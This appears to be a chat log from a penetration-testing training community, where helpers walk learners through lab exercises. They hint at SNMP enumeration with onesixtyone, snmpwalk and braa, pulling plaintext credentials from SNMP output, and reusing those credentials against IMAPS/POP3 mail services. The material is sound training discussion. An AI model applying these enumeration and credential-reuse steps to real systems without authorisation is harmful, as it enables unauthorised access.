im still stuck btw the rw didnt work like i thought

i often find that reporting vulnerbillities needs comfirmation to be done manually anyway so

All you gotta do is replace a word from the example commands given

just says command not found

Well then install the tool

If a command isn't found: make it found

apparently rwcommunity dont exist for me 🤦‍♂️

Never used rwcommunity

that's what the page was saying

? The only tools I saw showcased were braa, onesixtyone, and snmpwalk

rwcommunity is a setting in snmp

It's not a tool

welp i give up

Just scroll further down from rwcommunity lol

The subsection

Footprinting the Service

SNMPWalk

braa

braa wouldnt work for me

What is your braa command?

Bc the syntax is given in the example

unable to process queries invalid syntax

It helps if you show us your command

i'll delete it after

Bruh

Why are you convinced that NM is the comm string

Also it looks like you got that potentially from snmpwalk?

okay i changed it and still says invaild

idk why i had that pasted still

braa b*@<ip>:.1.3.6.*

(b* should be obvious) once you get the interesting script output: maybe evaluate what other ports are open

still invalid

Are you keeping the brackets? Or no

Because if you are: don't do that

no the brackets are gone

No spaces between the community string and the @ sign

yep no spaces

Copy paste from your terminal, to this chat

the stars stay right?

No

or astericks

okay

b* was a replacement for the community string that onesixtyone gave you

To not spoil it

yea i figured

i'll delete it rn

Don't forget the :.1.3.6.*

That * is the only one that stays

now its a invalid query

The :.1.3.6.* goes directly after the ip

i got it to run missed a .

Now: this output should be interesting

looks like the same output from the last tool

Snmpwalk? Yes

yea

They essentially do the same thing: you didn't say you did snmpwalk

(I inferred bc you had the user password in your copy/paste)

Now look at other running services and see how you can use those creds

i tried ssh but no luck

maybe other services will be more useful ¯_(ツ)_/¯

Return to enumerating ports

Also refer back to the engagement brief: you're told directly that this is a mail server

(MX, mail exchange)

yep still nothing

The output gave you a username and password

There's mail services running that you can try those creds against

i tried it

if its the password i think it is

The password was output in braa

Alongside username

the .sh? how do i download it

you can’t

look for creds😉

The output of the .sh file is in the braa output

Sounds like snmp

Hard lab of footprinting

Hello I'm currently doing Attacking Common Services - Medium, I heard that I'm suppose to get 6 open port I have been reseting the box but always get like 4/5 open port

Ah, this wad fun

might take a few resets

Give it a few minutes before scanning as well

Some services take a bit to start up

do i need to perform full port scan -p- or can i just do nmap -sCV ?

-p- is useful to be sure

this is aids

gt it will give it a go after resting it 🙂

Your enumeration is just bad

You have all the info available for the next steps

In fact you had the password copied at one point

im trying to crack it with hashcat

Why?

No need

It's the plaintext password

No cracking required

I think he talks abou the private key?

You find that through enumeration using those creds

i saw the password next to the name

Mhm

At what point is he rn?

Barely past snmp

Run nmap.

Check open ports

||Openssl+imaps||

His enum needs work

i need to get it automated

Automating won't help you learn

Nmap is automated

Nmap should generally be the first thing you do

yep got nmap ran

Evaluate the open ports it reveals

You ruled out 22. But the engagement is the big clue: mail server

yep got it

yep got the mail ports

Then all you need to do is auth to one of them

with what password thought all i got was a hash

...

No, you got the plaintext password

It's not a hash

I said it earlier

Output gave you username and password. The name of the .sh file as well should have been the giveaway

Don't make assumptions without ruling things out

is this for imaps/pop3?

Yep

Well the section is the hard lab

If that's what you meant

i pray for you marcie as support

Marcie always here to help

¯_(ツ)_/¯

Kid is just overthinking the fuck outta this

There was 0 indication that the output was a hash of any kind

imaps and pop3 is arguably the hardest part of the foothold exam

so

Nah

Tbh the hard lab was the easiest one, imo

Simplest chain

The easy was the hardes for me

^

yeah true. I dont remember it, that was 20 modules ago

They just use the labs difficulty rating

Amount of steps required

i just remember i spent some time understanding the lab, but i mean "hardest" is just the most time consumed. I think i spent an hour or so doing it so

not really hard, just more stuff to get into

My longest time was not reading the engagement clearly

After that it was smooth

so whats the right way to login to

use openssl to connect

it tells you everything in the cource

You have a username and password, refer back to the imap/pop3 section for syntax

Or the cheatsheet

You honestly need to spend more time understanding the given content instead of trying to rush through it

I'm not meaning to come off as rude about it, but that's what it feels like to me

But for a good majority of the skill assessments, it's taught within the module. Or its a method you learned from a previous module to move forward. I can say with certainty, the footprinting module skill exams can be done purely with the module section info.

(Sql was a pain in the ass tho)

yea it was

yeah i feel like if things doesnt work out after 30 min a lot of people come here to get a hint or ask how to do it just to claim points. Which is wrong, because you dont learn it

Remember that on the exam you cant ask for hints

Which is why I provide hints the way i do

so why not spend the extra min to learn it properly

Get the person to apply knowledge they should have been learning

Automated scripts are only as good as the person using them if you can't follow up with the next steps

A good majority of things can be done without msfconsole too

i usually dont use it. If i can chose between msfconsole or a python exploit i will go for the python exploit.

^

i think i got it

but i cant run commands

i mean its good and all, but i feel like i learn more from doing it manually than just run4root

Imap requires a prefix before commands